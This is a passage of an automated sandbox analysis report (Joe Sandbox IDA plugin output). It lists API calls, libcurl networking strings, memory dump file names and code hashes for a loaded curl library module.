                                                                                                                                  • Failed to set SO_KEEPALIVE on fd %d, xrefs: 6B8D43E9
                                                                                                                                  • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6B8D4473
                                                                                                                                  • Immediate connect fail for %s: %s, xrefs: 6B8D463A
                                                                                                                                  • Could not set TCP_NODELAY: %s, xrefs: 6B8D42EB
                                                                                                                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 6B8D4235
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastsetsockopt$Unothrow_t@std@@@__ehfuncinfo$??2@$CounterIoctlPerformanceQuery__alldvrmconnectcurl_msnprintfcurl_mvsnprintfgetsockoptioctlsocketsocket
                                                                                                                                  • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                  • API String ID: 194311702-3868455274
                                                                                                                                  • Opcode ID: 984086e28aeed9a14f46dad4b99d3572c469b34810c2d6651b7f5e00390ddf11
                                                                                                                                  • Instruction ID: 982c8c1da1a1c60c53a308c77e3434650d1b6564d8f9ffd775e994d30a428304
                                                                                                                                  • Opcode Fuzzy Hash: 984086e28aeed9a14f46dad4b99d3572c469b34810c2d6651b7f5e00390ddf11
                                                                                                                                  • Instruction Fuzzy Hash: E8F1BF71940219ABEB20DF74CC8AFAEB7B9EF45308F1405E7E509A7191DB799E808F50
                                                                                                                                  Strings
                                                                                                                                  • anonymous, xrefs: 6B8E3013
                                                                                                                                  • No more connections allowed to host %s: %zu, xrefs: 6B8E36CD
                                                                                                                                  • No connections available in cache, xrefs: 6B8E3823
                                                                                                                                  • proxy, xrefs: 6B8E3613, 6B8E361B
                                                                                                                                  • NTLM picked AND auth done set, clear picked!, xrefs: 6B8E3782
                                                                                                                                  • Couldn't resolve host '%s', xrefs: 6B8E38EA
                                                                                                                                  • host, xrefs: 6B8E360D
                                                                                                                                  • Re-using existing connection! (#%ld) with %s %s, xrefs: 6B8E3622
                                                                                                                                  • No connections available., xrefs: 6B8E36DB
                                                                                                                                  • Couldn't resolve proxy '%s', xrefs: 6B8E397B
                                                                                                                                  • NTLM-proxy picked AND auth done set, clear picked!, xrefs: 6B8E37AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'$NTLM picked AND auth done set, clear picked!$NTLM-proxy picked AND auth done set, clear picked!$No connections available in cache$No connections available.$No more connections allowed to host %s: %zu$Re-using existing connection! (#%ld) with %s %s$anonymous$host$proxy
                                                                                                                                  • API String ID: 0-2910903954
                                                                                                                                  • Opcode ID: 907e5d249c05d55fb42a1a55e6e2f093ad6c615001a556c6f1fd0038b1254305
                                                                                                                                  • Instruction ID: 37f514d9d5d2fda9b0d1eb685eb0cfe2e3bf0d2b5b306dbf321e6bf4106dd49e
                                                                                                                                  • Opcode Fuzzy Hash: 907e5d249c05d55fb42a1a55e6e2f093ad6c615001a556c6f1fd0038b1254305
                                                                                                                                  • Instruction Fuzzy Hash: 8762D770A04746ABD726CF74C881BEBB7F4BF06308F00056DE86997251EB39AD55CBA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  • easy handle already used in multi handle, xrefs: 6B8D9E59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: easy handle already used in multi handle
                                                                                                                                  • API String ID: 0-2284409743
                                                                                                                                  • Opcode ID: cbdea9f7fcbc22b0ece9dec74097b449664efa62bb03fa7bb096ebd8b547a1e0
                                                                                                                                  • Instruction ID: a4d124602c423e0733eeed809e59df6c71863c78e7efa87e9c406768e7d21d3c
                                                                                                                                  • Opcode Fuzzy Hash: cbdea9f7fcbc22b0ece9dec74097b449664efa62bb03fa7bb096ebd8b547a1e0
                                                                                                                                  • Instruction Fuzzy Hash: FB316E76E0011457EB218D69ECC2BABB7ACDB816A5F0405FBEC0CDB242E76DCC1182E1

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • getpeername.WS2_32(?,?,?), ref: 6B8D36FE
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D3708
                                                                                                                                    • Part of subcall function 6B90A0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B90A0E7
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  • getsockname.WS2_32(?,?,00000080), ref: 6B8D3772
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D377C
                                                                                                                                  Strings
                                                                                                                                  • getpeername() failed with errno %d: %s, xrefs: 6B8D3724
                                                                                                                                  • ssrem inet_ntop() failed with errno %d: %s, xrefs: 6B8D3801
                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 6B8D3798
                                                                                                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 6B8D38A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$curl_mvsnprintfgetpeernamegetsockname
                                                                                                                                  • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                  • API String ID: 673488319-670633250
                                                                                                                                  • Opcode ID: 16f6105c519ef0b2bd3e0279cbe4f13fa120267730848af49d5a3430940a6ea6
                                                                                                                                  • Instruction ID: 3241dc4535d3ef40d0b5423c6ced990bc8c10a394a306dae62725b6c6aac6820
                                                                                                                                  • Opcode Fuzzy Hash: 16f6105c519ef0b2bd3e0279cbe4f13fa120267730848af49d5a3430940a6ea6
                                                                                                                                  • Instruction Fuzzy Hash: 7B81D675900608ABD721DF74C841BEAB3F8FF59308F1045AEE99D97242EB35BA85CB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,0000000C,6B93B330,?), ref: 6B8D16FA
                                                                                                                                    • Part of subcall function 6B8D6E10: getaddrinfo.WS2_32(?,?,?,6B93B330), ref: 6B8D6E2E
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D1722
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D1728
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6B8D173B
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6B8D1749
                                                                                                                                  • send.WS2_32(?,?,00000001,00000000), ref: 6B8D1778
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D1782
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6B8D1790
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalErrorLastSection$Leave$Entercurl_msnprintfgetaddrinfosend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1592919352-0
                                                                                                                                  • Opcode ID: b525758311a51527db36f3348d10dd264a97e639c4da523467e38c5993db4181
                                                                                                                                  • Instruction ID: f4e571c50a500f5d292376d5cd2b68964b284bd3cc644e6962cf756dfa1678fc
                                                                                                                                  • Opcode Fuzzy Hash: b525758311a51527db36f3348d10dd264a97e639c4da523467e38c5993db4181
                                                                                                                                  • Instruction Fuzzy Hash: 5E21A335500619EFDB20AFB5CC85BABB7F9EF45300F004A2AE656C3250EB35E915CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,PROXY %s %s %s %li %li,?,?,?,?,?), ref: 6B8EA8EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: PROXY %s %s %s %li %li$TCP4$TCP6
                                                                                                                                  • API String ID: 1809024409-1242256665
                                                                                                                                  • Opcode ID: a90f215344d6a39a09428f975154f263db92eb9a2ce77a3c3742b0b94be0ea7d
                                                                                                                                  • Instruction ID: fac14e071e3d0ec2b9652a98a1d44de45f3afa87c49179a039b6a59471682759
                                                                                                                                  • Opcode Fuzzy Hash: a90f215344d6a39a09428f975154f263db92eb9a2ce77a3c3742b0b94be0ea7d
                                                                                                                                  • Instruction Fuzzy Hash: B841C675944248AAEB11DB74CC01FEA77B89F06608F0448E6F959DB242E73AE607CB71

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • curl_multi_remove_handle.LIBCURL(?), ref: 6B8E1681
                                                                                                                                  • curl_multi_cleanup.LIBCURL(?), ref: 6B8E1691
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B8E1904
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3107128920-0
                                                                                                                                  • Opcode ID: cad139307954d22f42981d7fa00797b7cfdca1df46f941657f90c769d66201b6
                                                                                                                                  • Instruction ID: 2314a1c1e53a9bda98c212f70212f50dc1bb9e6455883eabd88c217f9d1f9a3a
                                                                                                                                  • Opcode Fuzzy Hash: cad139307954d22f42981d7fa00797b7cfdca1df46f941657f90c769d66201b6
                                                                                                                                  • Instruction Fuzzy Hash: 14612D79004B60EBEB215FB4D909BC6BBE5BF07309F404C59E5AA92260C7B9A054CB75

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,6B921F4E,6B928951,6B928465,?,00000000), ref: 6B92F697
                                                                                                                                  • _free.LIBCMT ref: 6B92F6F4
                                                                                                                                  • _free.LIBCMT ref: 6B92F72A
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000015,000000FF,?,?,?,?,?,?,?,?,6B928987,00000000,?,?,0000000A), ref: 6B92F735
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: cf8ca2a50ec91477e0fc098017f01273862a147ea347ff99d34e5a6010446a6e
                                                                                                                                  • Instruction ID: 0e0dcfd8c7d58ef51669b544f32f7bb77f34d8cf1235bd20a000a917d7ed891f
                                                                                                                                  • Opcode Fuzzy Hash: cf8ca2a50ec91477e0fc098017f01273862a147ea347ff99d34e5a6010446a6e
                                                                                                                                  • Instruction Fuzzy Hash: 3A11CE36E685053ADB0116788D96F2A336EDBE67BCB200234F528921E8EB39C8064660

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8D14E0: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,6B8E1C62,?,00000000), ref: 6B8D15E0
                                                                                                                                    • Part of subcall function 6B8D14E0: LeaveCriticalSection.KERNEL32(?,?,?,6B8E1C62,?,00000000), ref: 6B8D15F3
                                                                                                                                    • Part of subcall function 6B8D14E0: closesocket.WS2_32(000006FC), ref: 6B8D1642
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000100,Connection #%ld to host %s left intact,?,?), ref: 6B8F8690
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeaveclosesocketcurl_msnprintf
                                                                                                                                  • String ID: %s$Connection #%ld to host %s left intact
                                                                                                                                  • API String ID: 283241466-118628944
                                                                                                                                  • Opcode ID: b6d415b2ec1963aacd64270e08bf56d89a1e5894fce04f4dce2fcb74518963ff
                                                                                                                                  • Instruction ID: 10319204d4a33f693b2333ab0764f673ca5b6c7c29237c6c178decdd6b35a0c7
                                                                                                                                  • Opcode Fuzzy Hash: b6d415b2ec1963aacd64270e08bf56d89a1e5894fce04f4dce2fcb74518963ff
                                                                                                                                  • Instruction Fuzzy Hash: DEA13870600B04EFDB218F75CC49BDAB7E8BF06348F0009A9E86957291DB7CA595CFA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • inet_pton.WS2_32(00000002,00000000,?), ref: 6B8E8590
                                                                                                                                  • inet_pton.WS2_32(00000017,00000000,?), ref: 6B8E85C0
                                                                                                                                  Strings
                                                                                                                                  • Hostname %s was found in DNS cache, xrefs: 6B8E850A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: inet_pton
                                                                                                                                  • String ID: Hostname %s was found in DNS cache
                                                                                                                                  • API String ID: 1350483568-2672672863
                                                                                                                                  • Opcode ID: 6bf5544faa7be49911fb875d4e92e1801faeca3ab78285083607480dd6a16c36
                                                                                                                                  • Instruction ID: 0a6e23b2ccf60b4830ab23bb86728379e1faea61f08bdee902f993f1823e5408
                                                                                                                                  • Opcode Fuzzy Hash: 6bf5544faa7be49911fb875d4e92e1801faeca3ab78285083607480dd6a16c36
                                                                                                                                  • Instruction Fuzzy Hash: C761F471D00219ABDB118FB4DC46BEFBBB8AF06318F000569E91477291E7399A56CBF1
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8D2B71
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8D2BA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                  • String ID: Connection time-out
                                                                                                                                  • API String ID: 885266447-165637984
                                                                                                                                  • Opcode ID: d71c490874930c85ed237f0f341cbe95dda15b0d28c68d1aa5859bc7cab1c224
                                                                                                                                  • Instruction ID: 3c370d83fd4a684f8d9c5e1872114f6b3a31e78d75a2ef39d15dbb722c0cbfc7
                                                                                                                                  • Opcode Fuzzy Hash: d71c490874930c85ed237f0f341cbe95dda15b0d28c68d1aa5859bc7cab1c224
                                                                                                                                  • Instruction Fuzzy Hash: 67718E71E00615DFDB14CF68C841BAAB7B5FF84314F148ABAD818AB351E77A9D42CB80
                                                                                                                                  Strings
                                                                                                                                  • User-Agent: %s, xrefs: 6B8E1A47
                                                                                                                                  • Connected to %s (%s) port %ld (#%ld), xrefs: 6B8E1B72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                                  • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                                                                                                                  • API String ID: 3107128920-3248832348
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(User-Agent: %s), ref: 6B8E270E
                                                                                                                                  Strings
                                                                                                                                  • User-Agent: %s, xrefs: 6B8E2709
                                                                                                                                  • Connected to %s (%s) port %ld (#%ld), xrefs: 6B8E2828
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                                                                                                                  • API String ID: 3307269620-3248832348
                                                                                                                                  APIs
                                                                                                                                  • getaddrinfo.WS2_32(?,?,?,6B93B330), ref: 6B8D6E2E
                                                                                                                                  • freeaddrinfo.WS2_32(6B93B330,?,?,6B93B330,?), ref: 6B8D6F4C
                                                                                                                                  • WSASetLastError.WS2_32(00002AF9,?,?,6B93B330,?), ref: 6B8D6F99
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1817844550-0
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(6B8D16D0,6B8D1218,6B928204,00000000,00000000,6B8D16D0), ref: 6B9283A9
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6B8D9136,00000000,00000000,6B8D16D0,6B8D1218,00000000,00000000), ref: 6B9283B5
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B9283BC
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2744730728-0
                                                                                                                                  APIs
                                                                                                                                  • SleepEx.KERNEL32(00000000,00000000), ref: 6B8D4758
                                                                                                                                  • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B8D4773
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D477D
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastSleepgetsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033474312-0
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,00000000,00000048), ref: 6B8D115D
                                                                                                                                  Strings
                                                                                                                                  • getaddrinfo() thread failed to start, xrefs: 6B8D11AA
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                  • String ID: getaddrinfo() thread failed to start
                                                                                                                                  • API String ID: 32694325-737161664
                                                                                                                                  APIs
                                                                                                                                  • recv.WS2_32(00000008,?,?,00000000), ref: 6B9007EE
                                                                                                                                  • WSAGetLastError.WS2_32(?,6B90737C,?,?,00000008,?), ref: 6B9007FB
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2514157807-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2692171526-0
                                                                                                                                  APIs
                                                                                                                                  • WSACloseEvent.WS2_32(50000000), ref: 6B8F7A66
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2624557715-0
                                                                                                                                  APIs
                                                                                                                                  • curl_easy_init.LIBCURL(00000044,00000000,?,6B8F6E06,00000078,?,?,?,?,?,?,?), ref: 6B8D2375
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_init
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4195830768-0
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,6B92F6DD,00000001,00000364,00000015,000000FF), ref: 6B92F7CE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,6B933F01,00000220,?,?,00000000,?,?,?,6B9284AA,6B928987,00000000,?), ref: 6B930EEF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
